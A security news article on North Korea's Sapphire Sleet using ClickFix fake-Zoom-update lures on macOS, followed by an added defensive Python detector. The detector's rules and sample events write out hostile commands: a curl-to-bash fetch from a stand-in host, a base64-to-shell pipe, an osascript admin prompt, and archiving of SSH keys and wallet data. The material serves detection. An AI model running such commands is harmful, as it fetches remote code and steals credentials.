North Korea's Sapphire Sleet Deploys ClickFix Attacks on macOS Users
Security researchers have identified a campaign by the North Korean threat actor Sapphire Sleet (Microsoft's designation; other vendors track the same cluster as BlueNoroff, a subgroup of the broader Lazarus Group) targeting macOS users through the ClickFix attack vector. The group is employing fake job offers and counterfeit Zoom software updates to compromise Apple Mac computers. The attacks rely on social engineering rather than a software vulnerability: victims are tricked into executing malicious commands themselves under the guise of resolving a technical issue, and those commands ultimately deploy credential-harvesting malware.
The ClickFix technique works by displaying a convincing error dialog or update prompt that instructs the user to copy a command and paste it into Terminal, ostensibly to fix the problem on screen. In these specific attacks, victims encounter fraudulent Zoom update notifications that claim to resolve video conferencing issues. When users follow the instructions, they run AppleScript and shell commands that establish persistence and exfiltrate sensitive data, including saved passwords, SSH keys and cryptocurrency wallet information. Because the victim types the command rather than opening a downloaded app, Gatekeeper and notarization checks never come into play: a script fetched with curl and piped into a shell carries no quarantine attribute and is executed with whatever privileges the logged-in user already has.
Sapphire Sleet, whose activity falls under the U.S. government's umbrella designation Hidden Cobra for North Korean state cyber operations and is associated with the Lazarus AppleJeus campaign of trojanized cryptocurrency trading applications, has historically focused on cryptocurrency theft to fund North Korean government operations. This campaign, however, demonstrates targeting that reaches beyond immediate financial gain, with the threat actors also harvesting corporate credentials and intellectual property. The group has been observed using legitimate developer tools such as Xcode to disguise malicious code and employing fileless execution techniques to evade traditional antivirus solutions.
Organizations with macOS infrastructure should deploy endpoint detection that records process ancestry and full command lines, restrict Terminal and scripting access where job roles permit it, and train employees to treat any "paste this command to fix the problem" instruction as a red flag. Security teams are advised to monitor for suspicious Zoom update domains and to alert on shells or osascript launched from Terminal that fetch remote content, decode base64 into a shell, request administrator privileges, or write to ~/Library/LaunchAgents; blocking only downloaded script files is insufficient, since a command piped straight into a shell never touches the file-based controls. This campaign underscores the increasing sophistication of nation-state threat actors in targeting macOS environments, which were previously considered lower risk than Windows deployments.
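The following detector is an added example, not code from the article or from any vendor it cites. It scores process-execution records of the kind an EDR or osquery's process_events table would supply (parent image name plus the child's full command line) against the ClickFix behaviours described above: a remote script piped into a shell, base64 decoded into a shell, an osascript request for administrator privileges, LaunchAgent persistence, and reads of SSH keys, the Keychain and wallet directories. The rule weights, the alert threshold, the wallet application names (Exodus, Electrum, Ledger Live) used as path indicators and every sample event are assumptions constructed for the demonstration, not indicators taken from this campaign.

```python
"""Heuristic scoring of macOS process events for ClickFix-style abuse.

Added example: the events, rule weights and threshold are constructed
for illustration and are not real telemetry or vendor detection logic.
"""
import re
from dataclasses import dataclass, field

# Parents worth scrutinising: a victim pasting into a terminal, or a
# shell/osascript already running the pasted command.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "osascript", "bash", "zsh", "sh"}

# (rule name, weight, regex over the command line). Weights are assumptions.
RULES = [
    ("remote_script_piped_to_shell", 5,
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("base64_decoded_into_shell", 5,
     re.compile(r"base64\s+(-[dD]|--decode)[^|]*\|\s*(ba|z)?sh\b")),
    ("osascript_admin_shell", 4,
     re.compile(r"osascript\s+-e\s+.*do shell script.*with administrator privileges", re.S)),
    ("launchagent_persistence", 4,
     re.compile(r"Library/LaunchAgents/[^ ]+\.plist")),
    ("keychain_access", 3,
     re.compile(r"\bsecurity\s+(dump-keychain|find-(generic|internet)-password)\b")),
    ("ssh_key_read", 3,
     re.compile(r"(~|/Users/[^/ ]+)/\.ssh/")),
    ("wallet_path_read", 3,  # assumed wallet app data directories
     re.compile(r"Library/Application Support/(Exodus|Electrum|Ledger Live)\b")),
]


@dataclass
class ProcessEvent:
    parent: str          # image name of the parent process
    cmdline: str         # full command line of the child process
    user: str = "user"   # local account that launched it


@dataclass
class Finding:
    event: ProcessEvent
    rules: list = field(default_factory=list)
    score: int = 0


def evaluate(event: ProcessEvent) -> Finding:
    """Match every rule against the command line and add a small bonus when
    the parent is an interactive shell, since ClickFix depends on the victim
    pasting the command rather than on an exploit."""
    finding = Finding(event=event)
    for name, weight, pattern in RULES:
        if pattern.search(event.cmdline):
            finding.rules.append(name)
            finding.score += weight
    if finding.rules and event.parent in INTERACTIVE_PARENTS:
        finding.rules.append("launched_from_interactive_shell")
        finding.score += 2
    return finding


def triage(events, threshold: int = 6):
    """Return findings at or above the threshold, highest score first.
    The threshold is set so that one weak indicator (e.g. a legitimate
    `ssh -i ~/.ssh/...`) from a terminal does not alert on its own."""
    hits = [evaluate(e) for e in events]
    return sorted((f for f in hits if f.score >= threshold),
                  key=lambda f: f.score, reverse=True)


# Constructed sample events: the first four mimic a ClickFix chain, the
# last two are ordinary developer activity that must stay below threshold.
SAMPLE_EVENTS = [
    ProcessEvent("Terminal",
                 'bash -c "curl -fsSL https://zoom-update.example/fix.sh | bash"'),
    ProcessEvent("Terminal", "echo Y3VybCAuLi4= | base64 -D | sh"),
    ProcessEvent("bash",
                 "osascript -e 'do shell script \"/tmp/.u\" with administrator privileges'"),
    ProcessEvent("sh",
                 'cp /tmp/agent.plist ~/Library/LaunchAgents/com.example.plist; '
                 'tar cf /tmp/k.tar ~/.ssh/ "$HOME/Library/Application Support/Exodus"'),
    ProcessEvent("Terminal", "git pull origin main"),
    ProcessEvent("Terminal", "ssh -i ~/.ssh/id_ed25519 dev@build.example"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"score={f.score:2d} parent={f.event.parent:9s} rules={f.rules}")
        print(f"         cmd={f.event.cmdline}")
```

Run as a script it prints the four chain events ranked by score and stays silent on the git and ssh commands. In production the records would come from the endpoint agent's process-event stream rather than the inline list, and the rule set should be tuned against the organization's own baseline of terminal usage before the threshold is trusted.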